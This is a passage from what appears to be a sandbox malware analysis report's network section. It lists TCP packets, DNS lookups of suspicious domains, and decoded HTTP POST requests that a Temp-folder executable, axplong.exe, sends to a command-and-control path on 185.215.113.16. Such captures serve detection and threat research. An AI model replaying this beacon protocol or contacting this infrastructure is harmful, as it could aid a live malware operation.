Jul 26, 2024 20:58:44.731615067 CEST	49744	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:44.731976986 CEST	49745	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:44.736908913 CEST	80	49745	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:44.737008095 CEST	49745	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:44.737070084 CEST	80	49744	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:44.737119913 CEST	49744	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:44.737216949 CEST	49745	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:44.742135048 CEST	80	49745	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:45.478420973 CEST	80	49745	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:45.478491068 CEST	49745	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:45.479196072 CEST	49745	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:45.484034061 CEST	80	49745	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:45.724616051 CEST	80	49745	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:45.726315022 CEST	49745	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:45.844266891 CEST	49745	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:45.844674110 CEST	49746	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:45.849591017 CEST	80	49746	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:45.849706888 CEST	49746	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:45.850002050 CEST	49746	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:45.850275040 CEST	80	49745	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:45.850341082 CEST	49745	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:45.854794979 CEST	80	49746	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:46.613194942 CEST	80	49746	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:46.613289118 CEST	49746	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:46.614039898 CEST	49746	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:46.618869066 CEST	80	49746	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:46.863632917 CEST	80	49746	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:46.863703966 CEST	49746	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:46.965646982 CEST	49746	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:46.965998888 CEST	49747	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:46.970887899 CEST	80	49747	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:46.970980883 CEST	49747	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:46.971004963 CEST	80	49746	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:46.971049070 CEST	49746	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:46.971175909 CEST	49747	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:46.977297068 CEST	80	49747	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:47.711698055 CEST	80	49747	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:47.711828947 CEST	49747	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:47.715014935 CEST	49747	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:47.719851971 CEST	80	49747	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:47.975126982 CEST	80	49747	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:47.975212097 CEST	49747	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:48.090224981 CEST	49747	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:48.090533018 CEST	49748	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:48.095489979 CEST	80	49748	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:48.095577955 CEST	49748	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:48.095588923 CEST	80	49747	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:48.095638037 CEST	49747	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:48.095824003 CEST	49748	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:48.101332903 CEST	80	49748	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:48.838536024 CEST	80	49748	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:48.838742018 CEST	49748	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:48.839401960 CEST	49748	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:48.844425917 CEST	80	49748	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:49.083878994 CEST	80	49748	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:49.084106922 CEST	49748	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:49.199558973 CEST	49748	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:49.200150013 CEST	49749	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:49.204961061 CEST	80	49748	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:49.205037117 CEST	49748	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:49.205732107 CEST	80	49749	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:49.205817938 CEST	49749	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:49.206029892 CEST	49749	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:49.210843086 CEST	80	49749	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:50.004976034 CEST	80	49749	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:50.007651091 CEST	49749	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:50.008418083 CEST	49749	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:50.013245106 CEST	80	49749	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:50.274813890 CEST	80	49749	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:50.274913073 CEST	49749	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:50.387129068 CEST	49749	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:50.387547970 CEST	49750	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:50.393436909 CEST	80	49750	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:50.393527031 CEST	49750	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:50.393661976 CEST	49750	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:50.396750927 CEST	80	49749	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:50.396807909 CEST	49749	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:50.398411036 CEST	80	49750	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:51.161209106 CEST	80	49750	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:51.161281109 CEST	49750	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:51.162239075 CEST	49750	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:51.167016029 CEST	80	49750	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:51.413222075 CEST	80	49750	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:51.415806055 CEST	49750	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:51.529490948 CEST	49750	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:51.529810905 CEST	49751	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:51.534782887 CEST	80	49751	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:51.534869909 CEST	49751	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:51.534873962 CEST	80	49750	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:51.534931898 CEST	49750	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:51.548163891 CEST	49751	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:51.553011894 CEST	80	49751	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:52.297684908 CEST	80	49751	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:52.297739983 CEST	49751	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:52.299247980 CEST	49751	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:52.311461926 CEST	80	49751	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:52.559371948 CEST	80	49751	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:52.559473038 CEST	49751	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:52.669949055 CEST	49751	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:52.670335054 CEST	49752	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:52.675120115 CEST	80	49751	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:52.675154924 CEST	80	49752	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:52.675184965 CEST	49751	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:52.675225973 CEST	49752	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:52.680330038 CEST	49752	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:52.685149908 CEST	80	49752	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:53.421619892 CEST	80	49752	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:53.421802998 CEST	49752	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:53.422672987 CEST	49752	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:53.427473068 CEST	80	49752	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:53.669347048 CEST	80	49752	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:53.669398069 CEST	49752	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:53.784432888 CEST	49752	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:53.784727097 CEST	49753	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:53.789684057 CEST	80	49753	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:53.789927959 CEST	49753	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:53.790009022 CEST	49753	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:53.791631937 CEST	80	49752	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:53.791680098 CEST	49752	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:53.794832945 CEST	80	49753	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:54.554902077 CEST	80	49753	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:54.555016041 CEST	49753	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:54.555740118 CEST	49753	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:54.560673952 CEST	80	49753	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:54.813822985 CEST	80	49753	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:54.813882113 CEST	49753	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:54.933959007 CEST	49753	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:54.934279919 CEST	49754	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:54.939094067 CEST	80	49754	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:54.939188004 CEST	49754	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:54.939321995 CEST	80	49753	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:54.939374924 CEST	49753	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:54.939399004 CEST	49754	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:54.944261074 CEST	80	49754	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:55.707354069 CEST	80	49754	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:55.707792044 CEST	49754	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:55.708503008 CEST	49754	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:55.713799953 CEST	80	49754	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:55.966603994 CEST	80	49754	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:55.967144966 CEST	49754	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:56.074809074 CEST	49755	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:56.074832916 CEST	49754	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:56.154866934 CEST	80	49755	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:56.154973984 CEST	49755	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:56.155086994 CEST	49755	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:56.162729025 CEST	80	49755	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:56.201699018 CEST	80	49754	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:56.209352970 CEST	80	49754	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:56.209410906 CEST	49754	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:57.120600939 CEST	80	49755	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:57.120666981 CEST	49755	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:57.121450901 CEST	49755	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:57.131820917 CEST	80	49755	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:57.417993069 CEST	80	49755	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:57.418076992 CEST	49755	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:57.527868986 CEST	49755	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:57.528290033 CEST	49756	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:57.689857960 CEST	80	49756	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:57.689873934 CEST	80	49755	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:57.689945936 CEST	49756	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:57.690066099 CEST	49755	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:57.691382885 CEST	49756	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:57.696192026 CEST	80	49756	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:58.480444908 CEST	80	49756	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:58.480782032 CEST	49756	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:58.481404066 CEST	49756	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:58.488151073 CEST	80	49756	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:58.737903118 CEST	80	49756	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:58.738270044 CEST	49756	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:58.842525959 CEST	49756	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:58.842545986 CEST	49757	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:58.853280067 CEST	80	49757	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:58.853498936 CEST	49757	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:58.853769064 CEST	49757	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:58.856251955 CEST	80	49756	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:58.856520891 CEST	49756	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:58.860702038 CEST	80	49757	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:59.614526033 CEST	80	49757	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:59.614705086 CEST	49757	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:59.659729958 CEST	49757	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:59.664825916 CEST	80	49757	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:59.935074091 CEST	80	49757	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:59.939119101 CEST	49757	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:00.044893980 CEST	49757	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:00.045267105 CEST	49758	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:00.050261974 CEST	80	49758	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:00.051131964 CEST	80	49757	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:00.051233053 CEST	49757	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:00.051256895 CEST	49758	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:00.053608894 CEST	49758	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:00.058556080 CEST	80	49758	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:00.882988930 CEST	80	49758	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:00.883050919 CEST	49758	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:00.883805037 CEST	49758	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:00.889772892 CEST	80	49758	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:01.130669117 CEST	80	49758	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:01.130795956 CEST	49758	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:01.246419907 CEST	49758	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:01.247788906 CEST	49759	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:01.252562046 CEST	80	49758	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:01.252671003 CEST	49758	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:01.253235102 CEST	80	49759	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:01.253515959 CEST	49759	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:01.253515959 CEST	49759	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:01.258604050 CEST	80	49759	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:02.042599916 CEST	80	49759	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:02.042695045 CEST	49759	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:02.044651985 CEST	49759	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:02.051188946 CEST	80	49759	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:02.294167042 CEST	80	49759	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:02.294428110 CEST	49759	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:02.403620958 CEST	49759	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:02.404011965 CEST	49760	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:02.409104109 CEST	80	49760	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:02.409213066 CEST	49760	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:02.409493923 CEST	49760	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:02.409645081 CEST	80	49759	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:02.409703970 CEST	49759	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:02.417349100 CEST	80	49760	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:03.197381973 CEST	80	49760	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:03.197447062 CEST	49760	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:03.201111078 CEST	49760	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:59:03.206502914 CEST	80	49760	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:03.457312107 CEST	80	49760	185.215.113.16	192.168.2.5
Jul 26, 2024 20:59:03.457400084 CEST	49760	80	192.168.2.5	185.215.113.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 20:58:03.985963106 CEST	59157	53	192.168.2.5	1.1.1.1
Jul 26, 2024 20:58:04.405982971 CEST	53	59157	1.1.1.1	192.168.2.5
Jul 26, 2024 20:58:32.835417986 CEST	55897	53	192.168.2.5	1.1.1.1
Jul 26, 2024 20:58:33.857022047 CEST	55897	53	192.168.2.5	1.1.1.1
Jul 26, 2024 20:58:34.870923042 CEST	55897	53	192.168.2.5	1.1.1.1
Jul 26, 2024 20:58:36.913149118 CEST	55897	53	192.168.2.5	1.1.1.1
Jul 26, 2024 20:58:39.109450102 CEST	53	55897	1.1.1.1	192.168.2.5
Jul 26, 2024 20:58:39.109461069 CEST	53	55897	1.1.1.1	192.168.2.5
Jul 26, 2024 20:58:39.109471083 CEST	53	55897	1.1.1.1	192.168.2.5
Jul 26, 2024 20:58:39.109478951 CEST	53	55897	1.1.1.1	192.168.2.5
Jul 26, 2024 20:58:39.113902092 CEST	56034	53	192.168.2.5	1.1.1.1
Jul 26, 2024 20:58:39.130059958 CEST	53	56034	1.1.1.1	192.168.2.5
Jul 26, 2024 20:58:39.134596109 CEST	51492	53	192.168.2.5	1.1.1.1
Jul 26, 2024 20:58:40.121159077 CEST	51492	53	192.168.2.5	1.1.1.1
Jul 26, 2024 20:58:41.120963097 CEST	51492	53	192.168.2.5	1.1.1.1
Jul 26, 2024 20:58:43.136523008 CEST	51492	53	192.168.2.5	1.1.1.1
Jul 26, 2024 20:58:45.464848995 CEST	53	51492	1.1.1.1	192.168.2.5
Jul 26, 2024 20:58:45.464873075 CEST	53	51492	1.1.1.1	192.168.2.5
Jul 26, 2024 20:58:45.464889050 CEST	53	51492	1.1.1.1	192.168.2.5
Jul 26, 2024 20:58:45.464903116 CEST	53	51492	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 26, 2024 20:58:03.985963106 CEST	192.168.2.5	1.1.1.1	0x74c6	Standard query (0)	atlpvt.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:32.835417986 CEST	192.168.2.5	1.1.1.1	0xb8e5	Standard query (0)	yosoborno.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:33.857022047 CEST	192.168.2.5	1.1.1.1	0xb8e5	Standard query (0)	yosoborno.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:34.870923042 CEST	192.168.2.5	1.1.1.1	0xb8e5	Standard query (0)	yosoborno.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:36.913149118 CEST	192.168.2.5	1.1.1.1	0xb8e5	Standard query (0)	yosoborno.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:39.113902092 CEST	192.168.2.5	1.1.1.1	0x1f9e	Standard query (0)	wshcnsd.xyz	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:39.134596109 CEST	192.168.2.5	1.1.1.1	0xf8dd	Standard query (0)	nusdhj.ws	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:40.121159077 CEST	192.168.2.5	1.1.1.1	0xf8dd	Standard query (0)	nusdhj.ws	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:41.120963097 CEST	192.168.2.5	1.1.1.1	0xf8dd	Standard query (0)	nusdhj.ws	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:43.136523008 CEST	192.168.2.5	1.1.1.1	0xf8dd	Standard query (0)	nusdhj.ws	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 26, 2024 20:58:04.405982971 CEST	1.1.1.1	192.168.2.5	0x74c6	No error (0)	atlpvt.com		58.65.168.132	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:39.109450102 CEST	1.1.1.1	192.168.2.5	0xb8e5	Server failure (2)	yosoborno.com	none	none	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:39.109461069 CEST	1.1.1.1	192.168.2.5	0xb8e5	Server failure (2)	yosoborno.com	none	none	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:39.109471083 CEST	1.1.1.1	192.168.2.5	0xb8e5	Server failure (2)	yosoborno.com	none	none	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:39.109478951 CEST	1.1.1.1	192.168.2.5	0xb8e5	Server failure (2)	yosoborno.com	none	none	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:39.130059958 CEST	1.1.1.1	192.168.2.5	0x1f9e	Name error (3)	wshcnsd.xyz	none	none	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:45.464848995 CEST	1.1.1.1	192.168.2.5	0xf8dd	Server failure (2)	nusdhj.ws	none	none	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:45.464873075 CEST	1.1.1.1	192.168.2.5	0xf8dd	Server failure (2)	nusdhj.ws	none	none	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:45.464889050 CEST	1.1.1.1	192.168.2.5	0xf8dd	Server failure (2)	nusdhj.ws	none	none	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:58:45.464903116 CEST	1.1.1.1	192.168.2.5	0xf8dd	Server failure (2)	nusdhj.ws	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

atlpvt.com

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49712	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:02.952902079 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:03.708194971 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:03.711478949 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:03.962657928 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 64 0d 0a 20 3c 63 3e 31 30 30 30 30 33 30 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 31 64 66 34 39 66 61 31 61 34 31 36 30 36 62 34 64 62 31 39 36 37 62 63 64 63 34 61 66 39 35 30 38 30 36 62 64 30 66 66 65 34 65 64 33 62 66 39 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4d <c>1000030001+++aa0ed3651df49fa1a41606b4db1967bcdc4af950806bd0ffe4ed3bf9#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49714	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:07.315011024 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000030001&unit=246122658369
Jul 26, 2024 20:58:08.093255043 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49715	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
